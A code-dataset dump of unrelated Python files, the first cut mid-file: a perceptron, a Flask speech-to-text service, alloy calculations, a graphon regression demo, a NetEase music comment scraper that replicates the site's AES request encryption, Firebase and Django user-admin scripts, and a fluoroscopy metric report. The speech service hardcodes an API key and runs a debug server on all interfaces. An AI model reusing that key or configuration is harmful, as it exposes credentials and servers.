1\r\n else:\r\n return 0\r\n\r\n def dsigmoid(self):\r\n return 'd(a)'\r\n\r\n def treinar(self):\r\n for i in self.dados_treinamento:\r\n print(i)\r\n\r\n def ajustar_pesos(self, erro, classe):\r\n for i in range(len(self.pesos) - 1):\r\n self.pesos[i] = self.atualiza_peso(self.pesos[i], erro, classe)\r\n\r\n self.pesos[len(\r\n self.pesos) - 1] = self.atualiza_bias(self.pesos[len(self.pesos) - 1], erro)\r\n\r\n def iniciar_pesos(self):\r\n for i in range(len(self.dados_treinamento[0])):\r\n self.pesos[i] = random.uniform(0, 1)\r\n\r\n def atualiza_peso(self, peso, erro, classe):\r\n return peso + (self.learning_rate * erro * float(classe))\r\n\r\n def atualiza_bias(self, bias, erro):\r\n return bias + self.learning_rate * erro\r\n\r\n def leitura(self, file):\r\n with open(file, 'r') as arquivo:\r\n linhas = csv.reader(arquivo, delimiter=',')\r\n instancia = 0\r\n for i in linhas:\r\n self.dados_treinamento[instancia] = i\r\n instancia += 1\r\n\r\n def somar(self):\r\n # parar = False\r\n it = 0\r\n while it <= 100:\r\n\r\n for i in self.dados_treinamento:\r\n soma = 0\r\n for j in range(len(self.dados_treinamento[i]) - 1):\r\n soma += float(self.dados_treinamento[i][j]) * self.pesos[j]\r\n\r\n soma += float(self.pesos[len(self.dados_treinamento[i]) - 1])\r\n resultado = self.sigmoid(soma)\r\n erro = float(self.dados_treinamento[i][-1]) - resultado\r\n\r\n if erro != 0:\r\n self.ajustar_pesos(erro, self.dados_treinamento[i][-1])\r\n # print(self.pesos)\r\n\r\n it += 1\r\n\r\n def erro(self, classe, resposta):\r\n return classe - resposta\r\n\r\n def testar(self):\r\n # dados_teste = [[0, 0, 0],\r\n # [0, 1, 0],\r\n # [1, 0, 0],\r\n # [1, 1, 1]\r\n # ]\r\n\r\n x = np.linspace(0, 1, 200)\r\n y = np.linspace(0, 1, 200)\r\n classe_0 = []\r\n classe_1 = []\r\n\r\n for i in range(len(x)):\r\n resultado = self.sigmoid(\r\n (self.pesos[0] * x[i]) + (self.pesos[1] * y[i]) + self.pesos[2])\r\n if resultado == 1:\r\n classe_1.append([x[i], y[i]])\r\n else:\r\n classe_0.append([x[i], y[i]])\r\n x_1 = []\r\n y_1 = []\r\n x_0 = []\r\n y_0 = []\r\n for i in classe_1:\r\n x_1.append(i[0])\r\n y_1.append(i[1])\r\n for i in classe_0:\r\n x_0.append(i[0])\r\n y_0.append(i[1])\r\n # print(classe_0)\r\n\r\n plt.plot(x_0, y_0, 'o')\r\n plt.plot(x_1, y_1, 'o')\r\n plt.show()\r\n\r\n\r\nperceptron = Perceptron('iris.data', 0.01)\r\n\r\n# print (perceptron.dados_teste)\r\n","sub_path":"rede_neural.py","file_name":"rede_neural.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"429892216","text":"import speech_recognition as sr\nfrom flask import Flask, request\n\nimport os\n\napp = Flask(__name__)\n\n\ndef speech2text(filePath, lang=\"zh-cn\", api=\"bing\"):\n r = sr.Recognizer()\n with sr.AudioFile(filePath) as source:\n audio = r.record(source)\n\n BING_KEY = \"fc6d59b192804002bd0396ba65a778c3\"\n try:\n if api == \"bing\":\n rsp = r.recognize_bing(audio, key=BING_KEY, language=lang)\n elif api == \"google\":\n rsp = r.recognize_google(audio, language=lang)\n return rsp\n except sr.UnknownValueError:\n print((\"Error: Microsoft Bing Voice Recognition could not\"\n \"understand audio\"))\n return 'null'\n except sr.RequestError as e:\n print(\"Error: Could not request results from Microsoft Bing Voice Recognition service; {0}\".format(e))\n return 'null'\n\n\n@app.route('/')\ndef index():\n return 'Hello world'\n\n\n@app.route('/speech', methods=['POST'])\ndef resolve():\n data = request.data\n f = open('audio.wav', 'wb')\n\n f.write(data)\n f.close()\n text = None\n try:\n text = speech2text('audio.wav', lang='zh-hk', api='bing')\n except:\n pass\n print(text)\n return text\n\n\nif __name__ == \"__main__\":\n # print(speech2text(\"1.wav\", api=\"google\"))\n # print(speech2text(\"audio.wav\", api=\"bing\"))\n app.run(host='0.0.0.0', port=8000, debug=True)\n","sub_path":"Speech/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"260981276","text":"import itertools\nimport json\nimport csv\n\nradius = {\n 'Cr':128,\n 'Hf':225,\n 'Nb':146,\n 'Ta':146,\n 'Mo':139,\n 'W':139,\n 'V':143,\n 'Zr':230\n }\n\ndef calc_delta_h(combinations, delta_h):\n total_h = []\n for x in combinations:\n ans = 0\n for i in itertools.combinations(x,2):\n a,b = i\n ans += 4*delta_h[a][b]*0.2*0.2\n total_h.append(ans)\n return total_h\n\ndef calc_delta(combinations, radius):\n delta_vals = []\n for x in combinations:\n avg_radius = sum(map(lambda a: 0.2*radius[a], x))\n delta = 0\n for i in x:\n delta += 0.2*(1 - radius[i]/avg_radius)**2\n delta_vals.append(100*(delta**0.5))\n return delta_vals\n\ndelta_h = {}\nwith open('./delta_h.json', 'r') as f:\n delta_h = json.load(f)\n\nelements = ['Cr', 'Hf','Mo','Nb', 'Ta', 'V', 'W', 'Zr']\nfinal_set = []\nfor x in itertools.combinations(elements, 5):\n temp = []\n for i in x:\n temp.append(i)\n final_set.append(temp)\n\ndelta_vals = calc_delta(final_set, radius)\nh_vals = calc_delta_h(final_set, delta_h)\nhvals = map(str, h_vals)\ndelta_vals = map(str, delta_vals)\noutput = []\nfor x in range(len(final_set)):\n output.append(final_set[x] + [hvals[x]] + [delta_vals[x]])\nrequired_output = []\nfor x in output:\n if float(x[5]) >= -15 and float(x[5]) <= 5 and float(x[6]) <= 6.6:\n required_output.append(x)\nwith open('min_delta_out.csv', 'w') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(required_output)\nwith open('delta_h.csv','w') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(output)\n","sub_path":"paramter.py","file_name":"paramter.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447507560","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cdist\n\ndef getData(n, k, graphon):\n b = np.random.uniform(0, 1, k)\n b = (b > 0.97) * 1 - (b < 0.03) * 1\n X = np.random.normal(0, 1, size=(n, k))\n Z = X @ b \n Q = graphon(Z)\n A = np.tril(np.random.uniform(0, 1, (n, n)) < Q, -1) * 1\n A = A + A.T\n return b, X, Q, A,Z\n\ndef getNbdKernel(A):\n A2 = A @ A.T\n dist = cdist(A2, A2, 'chebyshev')\n K = dist < np.percentile(dist, np.sqrt(np.log(n) / n) * 100, 0)\n\n return K * (1 / (np.sum(K, 0) + 1e-10))\n\nif __name__ == '__main__': \n np.random.seed(1)\n n = 1000\n k = 50\n\n b, X, Q, A, Z = getData(n, k, lambda Z: (np.sin((Z + Z[:, None])) + 1) * 0.2)\n K = getNbdKernel(A)\n \n lbd, v = np.linalg.eig(np.cov(X.T @ K))\n\n b_selected = v[:, np.argmax(lbd)]\n \n plt.figure(figsize=(11, 4))\n plt.stem(range(k), np.abs(b))\n plt.stem(range(k), np.abs(b_selected), markerfmt='yo', linefmt='y-')\n plt.title(\"Neighbohood inverse regression\")\n plt.xlim([-0.1, k])\n plt.ylim([-0.5, 1.2])\n plt.grid()\n plt.legend([r\"$|\\beta_i|$\", r\"$|\\widehat{\\beta}_i|$\", r\"$|\\widehat{\\beta}_i|$ (2nd)\"], loc=4)\n plt.tight_layout(pad=0.1)\n plt.savefig(\"nnir.png\")\n","sub_path":"NNIR/NNIR.py","file_name":"NNIR.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64455925","text":"import json\nimport requests\nfrom requests.exceptions import RequestException\nfrom Crypto.Cipher import AES\nfrom base64 import b64encode\nimport pandas as pd\nimport re\n\n\"\"\"\ncursor: -1\noffset: 0\norderType: 1\npageNo: 1\npageSize: 20\nrid: \"R_SO_4_36392029\"\nthreadId: \"R_SO_4_36392029\"\n\n\n function a(a) {\n var d, e, b = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\", c = \"\";\n for (d = 0; a > d; d += 1)\n e = Math.random() * b.length,\n e = Math.floor(e),\n c += b.charAt(e);\n return c\n }\n\n function b(a, b) {\n var c = CryptoJS.enc.Utf8.parse(b)\n , d = CryptoJS.enc.Utf8.parse(\"0102030405060708\")\n , e = CryptoJS.enc.Utf8.parse(a)\n , f = CryptoJS.AES.encrypt(e, c, {\n iv: d,\n mode: CryptoJS.mode.CBC\n });\n return f.toString()\n }\n\n\nwindow.asrsea(JSON.stringify(i8a), bwa9R([\"流泪\", \"强\"]), bwa9R(RQ4U.md), bwa9R([\"爱心\", \"女孩\", \"惊恐\", \"大笑\"]))\nfunction d(d, e, f, g) { \n var h = {} , i = a(16);\n return h.encText = b(d, g),\n h.encText = b(h.encText, i),\n h.encSecKey = c(i, e, f),\n :return h\n }\n\n\"\"\"\n\n# 定值\ne = \"010001\"\n\n# 定值\nf = \"00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7\"\n\n# 定值\ng = \"0CoJUm6Qyw8W8jud\"\n\n# 定值\ni = \"Yab6WAtcfEn43ye3\"\n\nencSecKey = \"414ea241651795194f192cf02b9c2f98e8f1c54cf1a922653403087f86617c9bc7455b80124cb4ddbefc10e59c9d488b08fa83ebb6d761e772cc7c172c20986373945f9d064e799d5693b56c1544e84fdc6b729e3e7d834a89c3d1e21f3980130bbd9c944e123527d362d0ca35bc04d78dc9cbb5362d6ae7155cb527bd6d6748\"\n\n\n# params = {\n# \"encSecKey\": \"43f1a7fe1d42ecdb1213ea8dd91af356033e45938070dead58eabdb8a3f07d98669805bb8ef8d9ad5a51258cde0994b5422c95c6268ac05e9be3e0d0d0fb66494ea3a1a1249817230dff9d8904027da0b91d87c08a6b18b2310f79906aa9e681ac351f6668d2e07352ba03418ed14808f6b7ace6970748444e5749caa1c0c119\",\n# \"encText\": \"/mCDWalAo+wpM9IBCF/d5zJsy1nvHUxyr/Ewy4qHkoK4G5HffDsOQ2KWVE6Lew8x53M7a0CcoRep8HwoG5Stf2lPGpEBR45V9exJ/P7gNm2xL9DcqmYhVvZWD8L7eoEE\"\n#\n# }\n\n\ndef get_encText(data):\n first = aes(data, g)\n second = aes(first, i)\n return second\n\n\n# aes加密补齐16位\n# def add_to_16(text):\n# if len(text.encode('utf-8')) % 16:\n# add = 16 - (len(text.encode('utf-8')) % 16)\n# else:\n# add = 0\n# text = text + ('\\0' * add)\n# return text.encode('utf-8')\n\n# aes加密补齐16位\ndef to_16(data):\n pad = 16 - len(data) % 16\n data += chr(pad) * pad\n return data\n\n\ndef aes(text, key):\n key = key.encode('utf-8')\n iv = '0102030405060708'.encode('utf-8') # 偏移量\n # text = add_to_16(text)\n text = to_16(text)\n cryptos = AES.new(key=key, iv=iv, mode=AES.MODE_CBC)\n cipher_text = cryptos.encrypt(text.encode('utf-8'))\n return str(b64encode(cipher_text), \"utf-8\")\n\n\ndef main():\n print(\"{:=^30}\".format('获取网易云歌曲热评'))\n while True:\n song_id = input('请输入歌曲ID(输入0退出): ')\n if song_id == '':\n print(\"歌曲ID不能为空!\")\n continue\n if song_id == '0':\n print('Bye')\n break\n # song_id = '402073808'\n # song_id = '36392029'\n # 请求参数\n\n # print(resp)\n music_name = get_music_name(song_id)\n print(music_name)\n resp = get_hot_comments(song_id)\n data_l = get_content(resp)\n df = pd.DataFrame(data_l)\n # df.to_excel('./files/网易云.xlsx')\n print(df)\n\n\ndef get_hot_comments(song_id):\n url = \"https://music.163.com/weapi/comment/resource/comments/get?csrf_token=\"\n d = {\n \"cursor\": \"-1\",\n \"offset\": \"0\",\n \"orderType\": \"1\",\n \"pageNo\": \"1\",\n \"pageSize\": \"20\",\n \"rid\": f\"R_SO_4_{song_id}\",\n \"threadId\": f\"R_SO_4_{song_id}\",\n }\n\n # 第二页数据\n # d = {\n # \"cursor\": \"-1\",\n # \"offset\": \"40\",\n # \"orderType\": \"1\",\n # \"pageNo\": \"2\",\n # \"pageSize\": \"20\",\n # \"rid\": \"R_SO_4_36392029\",\n # \"threadId\": \"R_SO_4_36392029\",\n # }\n\n data = {\n \"params\": get_encText(json.dumps(d)),\n \"encSecKey\": encSecKey\n }\n resp = get_url(data=data, url=url, method='POST', type='json')\n return resp\n\n\ndef get_url(url, data=None, method='GET', type='html'):\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.212 Safari/537.36 \"\n }\n try:\n if method == 'POST':\n r = requests.post(url, data=data, headers=headers)\n elif method == 'GET':\n r = requests.get(url, headers=headers)\n else:\n r = requests.get(url, headers=headers)\n if r.status_code == 200:\n if type == 'json':\n return r.json()\n elif type == 'html':\n return r.text\n else:\n return None\n except RequestException:\n return None\n\n\n# 获取热门评论\ndef get_content(data):\n data_l = []\n for item in data['data']['hotComments']:\n tmp = {\n '昵称': item['user']['nickname'],\n '评论': item['content'].strip().replace('\\n', ''),\n }\n data_l.append(tmp)\n return data_l\n\n\ndef get_music_name(song_id):\n url = f\"https://music.163.com/song?id={song_id}\"\n resp = get_url(url=url, method='GET', type='html')\n title = re.findall('(.*?)', resp)[0]\n return title\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/网易云音乐评论.py","file_name":"网易云音乐评论.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273350471","text":"import firebase_admin\r\nfrom firebase_admin import db\r\nfrom firebase_admin import auth\r\nfrom firebase_admin import credentials\r\n\r\n\r\ndef show_users():\r\n ref = db.reference('users')\r\n users = ref.get()\r\n for x in users:\r\n print(\"\\n\", \"User ID: \", x)\r\n for y in users[x]:\r\n print(\"\\t\", y, ':', users[x][y])\r\n\r\n\r\ndef add_user():\r\n email = input(\"Enter Email: \")\r\n password = input(\"Enter Password: \")\r\n try:\r\n user = auth.create_user(\r\n email=email,\r\n email_verified=True,\r\n password=password\r\n )\r\n\r\n city = input(\"Enter city: \")\r\n address = input(\"Enter address: \")\r\n firstName = input(\"Enter firstName: \")\r\n lastName = input(\"Enter lastName: \")\r\n\r\n users = db.reference('users')\r\n users.child(user.uid).set({'address': address, 'budget': 0, 'city': city, 'firstName': firstName, 'lastName': lastName})\r\n print(\"User: \", user.uid, \" successfully created\")\r\n except ValueError:\r\n print(\"Invalid arguments\")\r\n\r\n\r\ndef delete_user():\r\n uid = input(\"Enter User ID: \")\r\n try:\r\n auth.delete_user(uid=uid)\r\n users = db.reference('users')\r\n users.child(uid).delete()\r\n print(\"Successfully deleted user\")\r\n except firebase_admin.auth.AuthError:\r\n print(\"User not found\")\r\n\r\n\r\ncred = credentials.Certificate(\"fuelmanager-188122-firebase-adminsdk-ssjoq-d64a420c68.json\")\r\n\r\nfirebase_admin.initialize_app(cred, {'databaseURL': 'https://fuelmanager-188122.firebaseio.com/'})\r\n\r\nrunning = True\r\nwhile running:\r\n print(\"\"\"\r\n1.Show Users Database\r\n2.Add a User\r\n3.Delete a User\r\n4.Exit/Quit\r\n\"\"\")\r\n\r\n ans = input(\"What would you like to do? \")\r\n if ans == \"1\":\r\n show_users()\r\n elif ans == \"2\":\r\n add_user()\r\n elif ans == \"3\":\r\n delete_user()\r\n elif ans == \"4\":\r\n running = False\r\n else:\r\n print(\"\\n Not Valid Choice Try again\")\r\n\r\n\r\n","sub_path":"Additional Files/FuelManagerAdmin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297260529","text":"from django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom inventory.common.models import User\n\nimport datetime\nfrom inventory.common.helpers import get_api\n\ndef get_it_personnel():\n return get_api().groups(settings.IT_GROUP).get()['users']\n\ndef it_users():\n api = get_api()\n for username in get_it_personnel():\n user = api.users(username).get()\n username = user.get('username')\n u,_ = User.objects.get_or_create(username=username)\n u.first_name = user.get('first_name')\n u.last_name = user.get('last_name')\n u.is_superuser = True\n u.is_staff = True\n u.save()\n\nclass Command(BaseCommand):\n help = 'Sync IT users from FUM for Admin rights'\n\n def handle(self, *args, **options):\n it_users()\n","sub_path":"inventory/common/management/commands/sync_it.py","file_name":"sync_it.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349827979","text":"from GeradorDeAnuncios.Gerador import Anos\nfrom GeradorDeAnuncios.Gerador.TituloTraco import TituloTraco\nfrom GeradorDeAnuncios.Gerador.StopWords import StopWord\nfrom GeradorDeAnuncios.Gerador.TituloAnoCompleto import TituloAnoCompleto\n\n\nclass Titulo:\n\n def __init__(self, produto):\n self._produto = produto\n self._stopWord = StopWord(\"C:/Users/matheus.bertho/Desktop/Filosofo \"\n \"Piton/AutParts/GeradorDeAnuncios/CriadorDeAnunciosMagento/stopWords/stopwords\"\n \"-titulo.csv\").stopWorld()\n self._dicionario = produto.createDict()\n self._sap = produto.getSap()\n self._sku = produto.getSku()\n self._mostrarExemplos = self._arrayExemplosDados(self._dicionario)[0] # lista para utilizar\n self._utilizarDados = self._arrayExemplosDados(self._dicionario)[1] # lista para mostrar exemplo\n self._order = []\n self.anos = Anos.Anos(self._utilizarDados[2])\n\n def selecionaOrdem(self):\n mostraExemplos = self._mostrarExemplos\n utilizaDados = self._utilizarDados\n print('-' * 35)\n print(mostraExemplos)\n print('-' * 35)\n print(utilizaDados)\n print('-' * 35)\n opcaoFinal = []\n mostraFinal = []\n stop = False\n while not stop:\n print('-' * 35)\n print(\"selecione X para terminar e V para voltar!\")\n print(\"Selecione a ordem que quer montar seu texto: \")\n opt = str(input(\">> \"))\n print('-' * 35)\n\n if opt.lower() == \"v\":\n if len(mostraFinal) <= 0:\n print(\"Lista Vazia escolha uma opção!\")\n continue\n del (mostraFinal[-1])\n self._mostraTitleAtual(mostraFinal, utilizaDados)\n continue\n\n if opt.lower() == \"x\":\n stop = True\n continue\n try:\n mostraFinal.append(opt)\n self._mostraTitleAtual(mostraFinal, utilizaDados)\n opcaoFinal.append(int(opt))\n except ValueError:\n print(\"Insira um valor valido de escolha!\")\n except IndexError:\n print(\"Insira um valor valido de escolha!\")\n\n if len(opcaoFinal) <= 0:\n exit()\n self._order = opcaoFinal\n return opcaoFinal\n\n def _mostraTitleAtual(self, lista, opcoes):\n for x in lista:\n if x == '3':\n print('2001 2002' + ' ', end=\"\")\n continue\n print(opcoes[int(x)] + ' ', end=\"\")\n print()\n\n def _arrayExemplosDados(self, dicionario):\n # array que gera uma lista para mostrar ao usuario e outra para utilizar\n dadosDiscionario = []\n arrayTexto = []\n arrayFinal = []\n dicionarioEscolha = {}\n acc = 0\n for infoDicionario in dicionario:\n dadosDiscionario.append(infoDicionario)\n for resultadoDicionario in range(len(dadosDiscionario)):\n infoDicionario = dadosDiscionario[resultadoDicionario]\n result = dicionario[infoDicionario]\n texto = dadosDiscionario[resultadoDicionario]\n if result != \"\":\n arrayFinal.append(dicionario[infoDicionario])\n arrayTexto.append(f\"[{str(acc)}] {dadosDiscionario[resultadoDicionario]}\")\n dicionarioEscolha[texto] = result\n acc += 1\n return arrayTexto, arrayFinal\n\n def criaTitulos(self):\n order = self._order\n s = True\n if 2 in order and 3 in order:\n print(\"Não escolha duas opções de anos!!\")\n exit()\n elif 2 in order:\n # (\"Opção 03-05\")\n traco = TituloTraco(self._utilizarDados, self._order)\n return traco.tituloComTraco()\n elif 3 in order or s == True:\n # (\"Opção 2003 2004 2005\")\n listaAnos = TituloAnoCompleto(self._utilizarDados, self._order)\n return listaAnos.criaTituloTodosAnos()\n else:\n return print(\"Criando Titulo Sem ano\")\n\n def setOrder(self, order):\n self._order = order\n","sub_path":"GeradorDeAnuncios/Gerador/Titulo.py","file_name":"Titulo.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629612704","text":"from srqi.core import inquiry, Parse_Syngo, my_utils\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport collections\r\nimport math\r\n\r\n\r\ndef get_procedures_helper(procs, extra_procs, min_reps):\r\n \"\"\"Extract all the Syngo procedures that we're interested in\r\n (i.e. all the ones that have enough repetitions of the same procedure)\r\n and return them as a dictionary mapping cpt code combinations to\r\n lists of procedures\r\n\r\n Arguments:\r\n procs : a list of (SR) Procedure objects\r\n extra_procs : a list of non-SR procedure objects that could not\r\n be assigned to SR procedures\r\n\r\n Returns:\r\n a dictionary mapping cpt codes (represented as strings) to lists of\r\n Syngo objects\r\n \"\"\"\r\n # extract all the syngo procedures from procs and extra_procs\r\n syngo_procs = [p for p in extra_procs if type(p) == Parse_Syngo.Syngo]\r\n for proc in procs:\r\n if proc.has_syngo():\r\n proc.get_syngo().fluoro = my_utils.total_seconds(proc.get_pedal_time())/60.0\r\n syngo_procs.append(proc.get_syngo())\r\n #remove procs without a fluoro time entered\r\n syngo_procs = [p for p in syngo_procs if not p.fluoro is None]\r\n #remove procedures with less than MIN_REPS.value instances of same cpt code\r\n cpt_to_procs = my_utils.organize(syngo_procs, lambda p: p.get_cpts_as_string())\r\n for k in cpt_to_procs.keys():\r\n if len(cpt_to_procs[k]) < min_reps:\r\n del cpt_to_procs[k]\r\n #remove procedures where there is no variation\r\n for k in cpt_to_procs.keys():\r\n remove = True\r\n procs = cpt_to_procs[k]\r\n for i in range(1,len(cpt_to_procs[k])):\r\n if not procs[i] == procs[0]:\r\n remove = False\r\n break\r\n if remove:\r\n del cpt_to_procs[k]\r\n return cpt_to_procs\r\n \r\ndef sort_by_rads_helper(procs, procs_per_window):\r\n \"\"\"\r\n Arguments:\r\n procs : iterable of Syngo objects\r\n procs_per_window :\r\n\r\n Returns:\r\n a dict, rad1_to_procs[rad1]-->list of procedures sorted by dos_start\r\n \"\"\"\r\n rad1_to_procs = my_utils.organize(procs, lambda p:p.rad1)\r\n # sort each radiologist's list of procedures by their start date\r\n for p_list in rad1_to_procs.values():\r\n p_list.sort(key = lambda p:p.dos_start)\r\n # remove rads with too few procedures\r\n for rad1 in rad1_to_procs.keys():\r\n if len(rad1_to_procs[rad1]) < (procs_per_window +2):#have to be able to plot at least 3 points\r\n del rad1_to_procs[rad1]\r\n return rad1_to_procs\r\n\r\n\r\ndef get_procedure_windows(procs, procs_per_window, step_size ):\r\n \"\"\"\r\n Parameters:\r\n procedures : an iterable of Syngo objects\r\n procs_per_window : an int\r\n Returns:\r\n a list of lists of Syngo objects, each representing a window and\r\n having len of procs_per_window. each list is sorted by the\r\n procedure fluoro time\r\n \"\"\"\r\n windows = []\r\n for i in range(0, len(procs), step_size):\r\n if i+procs_per_window <= len(procs):\r\n window = sorted(procs[i:i+procs_per_window],\r\n key = lambda x:x.fluoro)\r\n windows.append(window)\r\n return windows\r\n\r\ndef _get_metric(proc, medians, normalize_penalty, clamp,\r\n use_log, log_fluoros, log_means, log_devs):\r\n fluoro = float(proc.fluoro)\r\n if use_log.value:\r\n log_mean = log_means[proc.get_cpts_as_string()]\r\n log_dev = log_devs[proc.get_cpts_as_string()]\r\n metric = (fluoro-log_mean)/log_dev\r\n if metric > 2 and clamp.value: # clamp at 2 std devs\r\n metric = 2\r\n else:\r\n med = medians[proc.get_cpts_as_string()]\r\n metric =(fluoro-med)\r\n if med >0 and normalize_penalty.value:\r\n metric = metric/float(med)\r\n if metric > 1 and clamp.value:#clamp at 2x median value\r\n metric = 1\r\n if metric > med and clamp.value:\r\n metric = med#clamp at 2x median value\r\n return metric\r\n\r\nclass Operator_Improvement(inquiry.Inquiry):\r\n MIN_REPS = inquiry.Inquiry_Parameter(500, \"Minimum procedure count\",\r\n \"The minimum number of times a procedure with the same CPT codes must occur to be considered to have a reasonable distribution\")\r\n PROCS_PER_WINDOW = inquiry.Inquiry_Parameter(400, \"Procedures Per Window\",\r\n \"Number of procedures that should be considered in the sliding window calculation of the operators performance metric.\")\r\n CLAMP = inquiry.Inquiry_Parameter(True, \"Limit penalty to 2x median\",\r\n \"If an operator exceeds the median fluoro time on a given procedure by more than 2x the median, only penalize him by 1x the median.\")\r\n NORMALIZE_PENALTY = inquiry.Inquiry_Parameter(True, \"Normalize penalties\",\r\n \"Divide penalties by the median to account for greater variation in longer procedures.\")\r\n USE_LOG = inquiry.Inquiry_Parameter(True, \"Use Lognormal Z-score\")\r\n \r\n def run(self, procs, context, extra_procs):\r\n cpt_to_procs = get_procedures_helper(procs, extra_procs, self.MIN_REPS.value)\r\n # calculate statistics for each procedure type\r\n medians = {}\r\n std_devs = {}\r\n means = {}\r\n log_fluoros = {}\r\n log_means = {}\r\n log_devs = {}\r\n for cpt, p_list in cpt_to_procs.iteritems():\r\n fluoro_list = [p.fluoro for p in p_list]\r\n medians[cpt] = float(np.median(fluoro_list))\r\n std_devs[cpt] = np.std(fluoro_list)\r\n means[cpt] = np.mean(fluoro_list)\r\n log_fluoros[cpt] = [math.log(x) if not x ==0 else math.log(.5) for x in fluoro_list]\r\n log_means[cpt] = np.mean(log_fluoros[cpt])#default to .5 since that is the lowest number that won't be rounded down to 0\r\n log_devs[cpt] = np.std(log_fluoros[cpt])\r\n # organize by rad1 and sort by date\r\n rad1_to_procs = sort_by_rads_helper( sum(cpt_to_procs.values(),[]), self.PROCS_PER_WINDOW.value )\r\n self._the_meat(rad1_to_procs, medians, log_fluoros, log_means, log_devs)\r\n self.medians = medians\r\n \r\n def _the_meat(self, rad1_to_procs, medians, log_fluoros, log_means, log_devs):\r\n \"\"\"Set self.lookup, which is the meat of self.run\r\n Everything else in self.run is basically preprocessing\r\n\r\n Arguments:\r\n rad1_to_procs : dictionary mapping rad1 (a string) to a list of\r\n Syngo procedures\r\n medians : dictionary mapping a cpt code set (a string) to a float\r\n \"\"\"\r\n # calculate raw deviations\r\n raw_devs = {}\r\n for rad1, p_list in rad1_to_procs.iteritems():\r\n devs = []\r\n for p in p_list:\r\n med = medians[p.get_cpts_as_string()]\r\n devs.append(p.fluoro-med)\r\n raw_devs[rad1] = devs\r\n self.raw_devs = raw_devs\r\n # calculate metrics\r\n rad1_to_out = {}\r\n for rad1, p_list in rad1_to_procs.iteritems():\r\n out = []\r\n metric_queue = collections.deque()\r\n cum_metric = 0\r\n for i, proc in enumerate(p_list):\r\n \r\n metric = _get_metric(proc, medians = medians,\r\n normalize_penalty = self.NORMALIZE_PENALTY,\r\n clamp = self.CLAMP,\r\n use_log = self.USE_LOG,\r\n log_fluoros = log_fluoros,\r\n log_means = log_means,\r\n log_devs = log_devs)\r\n cum_metric += metric\r\n metric_queue.append(metric)\r\n if len(metric_queue)>=self.PROCS_PER_WINDOW.value:\r\n if len(metric_queue) > self.PROCS_PER_WINDOW.value:\r\n cum_metric -= metric_queue.popleft()\r\n if i == len(p_list)-1 or not (proc.dos_start == p_list[i+1].dos_start):\r\n out.append((proc.dos_start, cum_metric/self.PROCS_PER_WINDOW.value))\r\n rad1_to_out[rad1] = out\r\n self.lookup = rad1_to_out #rad1_to_out[rad1][window_number] = (date, metric value)\r\n\r\n\r\n def get_tables(self):\r\n out = []\r\n for rad1 in self.lookup.keys():\r\n dates, metrics = zip(*self.lookup[rad1])\r\n dates = [''] + list(dates)\r\n metrics = [rad1] + list(metrics)\r\n out.append((dates,metrics))\r\n medians_table = [(\"Procedure Type\", \"Median Fluoro Time\")]\r\n for cpts, median in self.medians.iteritems():\r\n medians_table.append((cpts, median))\r\n out.append(medians_table)\r\n return out\r\n\r\n def _get_all_together_figure(self, legend = False):\r\n fig = plt.figure()\r\n from matplotlib import cm\r\n colormap = cm.get_cmap(name='hsv')\r\n colors = [colormap(i) for i in np.linspace(0,0.9, len(self.lookup.keys()))]\r\n for i,rad1 in enumerate(self.lookup.keys()):\r\n dates, metrics = zip(*self.lookup[rad1]) #pythonic idiom for \"unzip\"\r\n plt.plot(dates, metrics, color = colors[i], label =rad1)\r\n plt.title(\"All combined\")\r\n plt.xlabel(\"Window End Date\")\r\n plt.ylabel(\"Metric (positive values --> higher fluoro time)\")\r\n fig.autofmt_xdate()\r\n if legend:\r\n plt.legend()\r\n return fig\r\n \r\n \r\n def get_figures(self):\r\n figs = []\r\n #all together\r\n figs.append(self._get_all_together_figure(False))\r\n figs.append(self._get_all_together_figure(True))\r\n axis_ranges = plt.axis()\r\n #individual operators\r\n for rad1 in self.lookup.keys():\r\n dates, metrics = zip(*self.lookup[rad1]) #pythonic idiom for \"unzip\"\r\n fig = plt.figure()\r\n plt.plot(dates, metrics)\r\n plt.axis(axis_ranges)\r\n plt.title(rad1)\r\n plt.xlabel(\"Window End Date\")\r\n plt.ylabel(\"Metric (positive values --> higher fluoro time)\")\r\n fig.autofmt_xdate()\r\n figs.append(fig)\r\n \r\n #TODO: all averaged together\r\n \r\n return figs\r\n\r\n \r\nif __name__ == '__main__':\r\n inquiry.inquiry_main(Operator_Improvement, 